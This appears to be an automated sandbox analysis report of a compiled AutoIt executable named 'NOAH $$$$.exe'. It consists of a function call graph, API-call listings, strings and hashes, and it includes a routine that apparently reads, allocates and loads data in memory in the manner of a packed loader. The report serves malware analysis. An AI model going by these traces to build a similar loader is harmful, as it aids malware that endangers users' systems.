88144 408cf9 88144->88141 88145 42976c 88144->88145 88147 408d2d 88144->88147 88332 45e737 90 API calls 3 library calls 88145->88332 88321 403d10 88147->88321 88150 408d71 moneypunct 88150->86970 88151 408d45 moneypunct 88151->88150 88152 408f40 VariantClear 88151->88152 88152->88151 88154 425c87 88153->88154 88155 40d15f 88153->88155 88156 425cc7 88154->88156 88157 425ca1 TranslateAcceleratorW 88154->88157 88155->86970 88157->88155 88159 42602f 88158->88159 88162 40d17f 88158->88162 88159->86970 88160 40d18c 88160->86970 88161 42608e IsDialogMessageW 88161->88160 88161->88162 88162->88160 88162->88161 88623 430c46 GetClassLongW 88162->88623 88164->86970 88165->86933 88166->86938 88167->86970 88168->86970 88169->86970 88170->86970 88171->86967 88172->86967 88173->86967 88174->86967 88175->86967 88176->86967 88177->86967 88179 403cdf 88178->88179 88180 408f40 VariantClear 88179->88180 88181 403ce7 88180->88181 88181->86979 88182->86967 88183->86967 88184->86970 88185->86930 88187 453439 88186->88187 88188 453419 88186->88188 88187->87909 88189 45342f 88188->88189 88249 4531b1 85 API calls 5 library calls 88188->88249 88189->87909 88191 453425 88191->87909 88192->87915 88193->87917 88194->87902 88195->87946 88197 40ba49 88196->88197 88198 40ba1b moneypunct _memmove 88196->88198 88200 4115d7 52 API calls 88197->88200 88199 4115d7 52 API calls 88198->88199 88201 40ba22 88199->88201 88200->88198 88201->87929 88202->87926 88204->87948 88249->88191 88259->87955 88260->87958 88261->87975 88262->87976 88263->87963 88264->88068 88265->87985 88266->87991 88267->87998 88268->88100 88269->87998 88270->88010 88271->88034 88272->88041 88273->88004 88274->88006 88275->88071 88276->88071 88277->88071 88278->88025 88279->88045 88280->88028 88281->88055 88282->88079 88283->88079 88284->88068 88285->88084 88286->88096 88287->88090 88288->88097 88291->88045 88292->87995 88293->88117 88294->88137 88295->88117 88296->88112 88297->88117 88298->88112 88299->88121 88300->88112 88301->88124 88302->88112 88303->88112 88304->88119 88306 4289d2 88305->88306 88307 408db3 88305->88307 88338 45e737 90 API calls 3 library calls 88306->88338 88334 40bec0 88307->88334 88310 408dc9 88311 4289e5 88310->88311 88313 428a05 88310->88313 88314 40ba10 52 API calls 88310->88314 88316 40a780 201 API calls 88310->88316 88317 408e64 88310->88317 88319 408f40 VariantClear 88310->88319 88320 408e5a 88310->88320 88339 45e737 90 API calls 3 library calls 88311->88339 88315 408f40 VariantClear 88313->88315 88314->88310 88315->88320 88316->88310 88318 408f40 VariantClear 88317->88318 88318->88320 88319->88310 88320->88144 88322 408f40 VariantClear 88321->88322 88323 403d20 88322->88323 88324 403cd0 VariantClear 88323->88324 88325 403d4d 88324->88325 88341 46e91c 88325->88341 88344 4813fa 88325->88344 88354 45e17d 88325->88354 88364 467897 88325->88364 88408 4755ad 88325->88408 88326 403d76 88326->88141 88326->88151 88332->88141 88333->88143 88335 40bed0 88334->88335 88336 40bef2 88335->88336 88340 45e737 90 API calls 3 library calls 88335->88340 88336->88310 88338->88311 88339->88313 88340->88336 88411 46e785 88341->88411 88343 46e92f 88343->88326 88345 45340c 85 API calls 88344->88345 88346 481438 88345->88346 88347 402880 95 API calls 88346->88347 88348 48143f 88347->88348 88349 481465 88348->88349 88350 40a780 201 API calls 88348->88350 88352 481469 88349->88352 88516 40e710 53 API calls 88349->88516 88350->88349 88352->88326 88353 4814a4 88353->88326 88355 45e198 88354->88355 88356 45e19c 88355->88356 88357 45e1b8 88355->88357 88360 408f40 VariantClear 88356->88360 88358 45e1cc 88357->88358 88359 45e1db FindClose 88357->88359 88362 45e1d9 moneypunct 88358->88362 88363 44ae3e CloseHandle 88358->88363 88359->88362 88361 45e1a4 88360->88361 88361->88326 88362->88326 88363->88362 88365 4678bb 88364->88365 88368 45340c 85 API calls 88365->88368 88393 467954 88365->88393 88366 4115d7 52 API calls 88367 467989 88366->88367 88370 467995 88367->88370 88520 40da60 53 API calls 88367->88520 88369 4678f6 88368->88369 88371 413a0e __wsplitpath 46 API calls 88369->88371 88373 4533eb 85 API calls 88370->88373 88374 4678fc 88371->88374 88375 4679b7 88373->88375 88376 401b10 52 API calls 88374->88376 88377 40de40 60 API calls 88375->88377 88378 46790c 88376->88378 88379 4679c3 88377->88379 88517 40d200 52 API calls 2 library calls 88378->88517 88381 4679c7 GetLastError 88379->88381 88382 467a05 88379->88382 88383 467917 88383->88393 88518 4339fa GetFileAttributesW FindFirstFileW FindClose 88383->88518 88392 467928 88392->88393 88393->88366 88394 467964 88393->88394 88394->88326 88522 475077 88408->88522 88410 4755c0 88410->88326 88412 46e7a2 88411->88412 88413 4115d7 52 API calls 88412->88413 88416 46e802 88412->88416 88414 46e7ad 88413->88414 88415 46e7b9 88414->88415 88459 40da60 53 API calls 88414->88459 88460 4533eb 88415->88460 88417 46e7e5 88416->88417 88424 46e82f 88416->88424 88418 408f40 VariantClear 88417->88418 88421 46e7ea 88418->88421 88421->88343 88423 46e8b5 88452 4680ed 88423->88452 88424->88423 88426 46e845 88424->88426 88429 4533eb 85 API calls 88426->88429 88439 46e84b 88429->88439 88431 46e8bb 88456 443fbe 88431->88456 88432 46e87a 88479 4689f4 59 API calls 88432->88479 88434 46e883 88480 4013c0 52 API calls 88434->88480 88439->88432 88439->88434 88440 46e88f 88445 46e911 88445->88343 88450 46e881 88450->88445 88483 40da20 88450->88483 88453 468100 88452->88453 88454 4680fa 88452->88454 88453->88431 88487 467ac4 55 API calls 2 library calls 88454->88487 88488 443e36 88456->88488 88459->88415 88461 453404 88460->88461 88462 4533f8 88460->88462 88464 40de40 88461->88464 88462->88461 88495 4531b1 85 API calls 5 library calls 88462->88495 88465 40da20 CloseHandle 88464->88465 88466 40de4e 88465->88466 88496 40f110 88466->88496 88479->88450 88480->88440 88487->88453 88491 443e19 88488->88491 88495->88461 88516->88353 88517->88383 88518->88392 88520->88370 88523 4533eb 85 API calls 88522->88523 88524 4750b8 88523->88524 88525 4750ee 88524->88525 88526 475129 88524->88526 88527 408f40 VariantClear 88525->88527 88575 4646e0 88526->88575 88535 4750f5 88527->88535 88535->88410 88618 4536f7 53 API calls 88575->88618 88577 4646fc 88619 4426cd 59 API calls _wcslen 88577->88619 88579 464711 88581 40bc70 52 API calls 88579->88581 88587 46474b 88579->88587 88582 46472c 88581->88582 88586 464793 88587->88586 88621 463ad5 64 API calls __wcsicoll 88587->88621 88618->88577 88619->88579 88621->88586 88623->88162 88624 42d154 88628 480a8d 88624->88628 88626 42d161 88627 480a8d 201 API calls 88626->88627 88627->88626 88629 480ae4 88628->88629 88630 480b26 88628->88630 88631 480aeb 88629->88631 88632 480b15 88629->88632 88633 40bc70 52 API calls 88630->88633 88634 480aee 88631->88634 88635 480b04 88631->88635 88661 4805bf 201 API calls 88632->88661 88652 480b2e 88633->88652 88634->88630 88637 480af3 88634->88637 88660 47fea2 201 API calls __itow_s 88635->88660 88659 47f135 201 API calls 88637->88659 88640 40e0a0 52 API calls 88640->88652 88642 408f40 VariantClear 88644 481156 88642->88644 88643 480aff 88643->88642 88645 408f40 VariantClear 88644->88645 88646 48115e 88645->88646 88646->88626 88647 401980 53 API calls 88647->88652 88649 40c2c0 52 API calls 88649->88652 88650 40e710 53 API calls 88650->88652 88651 40a780 201 API calls 88651->88652 88652->88640 88652->88643 88652->88647 88652->88649 88652->88650 88652->88651 88654 408e80 VariantClear 88652->88654 88655 480ff5 88652->88655 88662 45377f 52 API calls 88652->88662 88663 45e951 53 API calls 88652->88663 88664 40e830 53 API calls 88652->88664 88665 47925f 53 API calls 88652->88665 88666 47fcff 201 API calls 88652->88666 88654->88652 88667 45e737 90 API calls 3 library calls 88655->88667 88659->88643 88660->88643 88661->88643 88662->88652 88663->88652 88664->88652 88665->88652 88666->88652 88667->88643 88668 42b14b 88669 40bc10 53 API calls 88668->88669 88670 42b159 88669->88670 88671 4096a0 338 API calls 88670->88671 88672 42b177 88671->88672 88675 44b92d VariantClear 88672->88675 88674 42bc5b 88675->88674 88676 425b2b 88681 40f000 88676->88681 88680 425b3a 88682 4115d7 52 API calls 88681->88682 88683 40f007 88682->88683 88684 4276ea 88683->88684 88690 40f030 88683->88690 88689 41130a 51 API calls __cinit 88689->88680 88691 40f039 88690->88691 88692 40f01a 88690->88692 88720 41130a 51 API calls __cinit 88691->88720 88694 40e500 88692->88694 88695 40bc70 52 API calls 88694->88695 88696 40e515 GetVersionExW 88695->88696 88697 402160 52 API calls 88696->88697 88698 40e557 88697->88698 88721 40e660 88698->88721 88704 427674 88707 4276c6 GetSystemInfo 88704->88707 88706 40e5cd GetCurrentProcess 88742 40ef20 LoadLibraryA GetProcAddress 88706->88742 88709 4276d5 GetSystemInfo 88707->88709 88710 40e5e0 88710->88709 88735 40efd0 88710->88735 88713 40e629 88739 40ef90 88713->88739 88716 40e641 FreeLibrary 88717 40e644 88716->88717 88718 40e653 FreeLibrary 88717->88718 88719 40e656 88717->88719 88718->88719 88719->88689 88720->88692 88722 40e667 88721->88722 88723 42761d 88722->88723 88724 40c600 52 API calls 88722->88724 88725 40e55c 88724->88725 88726 40e680 88725->88726 88727 40e687 88726->88727 88728 427616 88727->88728 88729 40c600 52 API calls 88727->88729 88730 40e566 88729->88730 88730->88704 88731 40ef60 88730->88731 88732 40e5c8 88731->88732 88733 40ef66 LoadLibraryA 88731->88733 88732->88706 88732->88710 88733->88732 88734 40ef77 GetProcAddress 88733->88734 88734->88732 88736 40e620 88735->88736 88737 40efd6 LoadLibraryA 88735->88737 88736->88707 88736->88713 88737->88736 88738 40efe7 GetProcAddress 88737->88738 88738->88736 88743 40efb0 LoadLibraryA GetProcAddress 88739->88743 88741 40e632 GetNativeSystemInfo 88741->88716 88741->88717 88742->88710 88743->88741 88744 425b5e 88749 40c7f0 88744->88749 88748 425b6d 88784 40db10 52 API calls 88749->88784 88751 40c82a 88785 410ab0 6 API calls 88751->88785 88753 40c86d 88754 40bc70 52 API calls 88753->88754 88755 40c877 88754->88755 88756 40bc70 52 API calls 88755->88756 88757 40c881 88756->88757 88758 40bc70 52 API calls 88757->88758 88759 40c88b 88758->88759 88760 40bc70 52 API calls 88759->88760 88761 40c8d1 88760->88761 88762 40bc70 52 API calls 88761->88762 88763 40c991 88762->88763 88786 40d2c0 52 API calls 88763->88786 88765 40c99b 88787 40d0d0 53 API calls 88765->88787 88767 40c9c1 88768 40bc70 52 API calls 88767->88768 88769 40c9cb 88768->88769 88788 40e310 53 API calls 88769->88788 88771 40ca28 88772 408f40 VariantClear 88771->88772 88773 40ca30 88772->88773 88774 408f40 VariantClear 88773->88774 88775 40ca38 GetStdHandle 88774->88775 88776 429630 88775->88776 88777 40ca87 88775->88777 88776->88777 88778 429639 88776->88778 88783 41130a 51 API calls __cinit 88777->88783 88789 4432c0 57 API calls 88778->88789 88780 429641 88790 44b6ab CreateThread 88780->88790 88782 42964f CloseHandle 88782->88777 88783->88748 88784->88751 88785->88753 88786->88765 88787->88767 88788->88771 88789->88780 88790->88782 88791 44b5cb 58 API calls 88790->88791 88792 425b6f 88797 40dc90 88792->88797 88796 425b7e 88798 40bc70 52 API calls 88797->88798 88799 40dd03 88798->88799 88806 40f210 88799->88806 88801 426a97 88803 40dd96 88803->88801 88804 40ddb7 88803->88804 88809 40dc00 52 API calls 2 library calls 88803->88809 88805 41130a 51 API calls __cinit 88804->88805 88805->88796 88810 40f250 RegOpenKeyExW 88806->88810 88808 40f230 88808->88803 88809->88803 88811 425e17 88810->88811 88812 40f275 RegQueryValueExW 88810->88812 88811->88808 88813 40f2c3 RegCloseKey 88812->88813 88814 40f298 88812->88814 88813->88808 88815 40f2a9 RegCloseKey 88814->88815 88816 425e1d 88814->88816 88815->88808 88817 3fcca53 88818 3fcca5a 88817->88818 88819 3fccaf8 88818->88819 88820 3fcca62 88818->88820 88837 3fcd3a8 9 API calls 88819->88837 88824 3fcc708 88820->88824 88823 3fccadf 88825 3fca0f8 GetPEB 88824->88825 88828 3fcc7a7 88825->88828 88827 3fcc7d8 CreateFileW 88827->88828 88830 3fcc7e5 88827->88830 88829 3fcc801 VirtualAlloc 88828->88829 88828->88830 88835 3fcc908 CloseHandle 88828->88835 88836 3fcc918 VirtualFree 88828->88836 88838 3fcd618 GetPEB 88828->88838 88829->88830 88831 3fcc822 ReadFile 88829->88831 88832 3fcc9f4 VirtualFree 88830->88832 88833 3fcca02 88830->88833 88831->88830 88834 3fcc840 VirtualAlloc 88831->88834 88832->88833 88833->88823 88834->88828 88834->88830 88835->88828 88836->88828 88837->88823 88839 3fcd642 88838->88839 88839->88827
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 004096C1
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • _memmove.LIBCMT ref: 0040970C
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                                        • _memmove.LIBCMT ref: 00409D96
                                                                                                                                        • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                                        • _memmove.LIBCMT ref: 004297E5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2383988440-0
                                                                                                                                        • Opcode ID: c9aeae05f9e297f4f4d27e5cc88271dfec8111064548994f186f59c23e97ced8
                                                                                                                                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                                        • Opcode Fuzzy Hash: c9aeae05f9e297f4f4d27e5cc88271dfec8111064548994f186f59c23e97ced8
                                                                                                                                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NOAH $$$$.exe,00000104,?), ref: 00401F4C
                                                                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\NOAH $$$$.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                                        • String ID: C:\Users\user\Desktop\NOAH $$$$.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                        • API String ID: 2495805114-2055323591
                                                                                                                                        • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                        • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1919 427693-427696 1915->1919 1920 427688-427691 1915->1920 1924 4276b4-4276be 1916->1924 1921 427625-427629 1917->1921 1922 40e59c-40e59f 1917->1922 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1919->1924 1927 427698-4276a8 1919->1927 1920->1924 1929 427636-427640 1921->1929 1930 42762b-427631 1921->1930 1925 40e5a5-40e5ae 1922->1925 1926 427654-427657 1922->1926 1937 4276c6-4276ca GetSystemInfo 1924->1937 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1924 1934->1924 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1918 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                                        • String ID: 0SH
                                                                                                                                        • API String ID: 3363477735-851180471
                                                                                                                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                        • API String ID: 2574300362-3542929980
                                                                                                                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                                        APIs
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                        • API String ID: 1762048999-758534266
                                                                                                                                        • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                        • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NOAH $$$$.exe,00000104,?), ref: 00401F4C
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                        • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                        • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                        • __wcsicoll.LIBCMT ref: 00402049
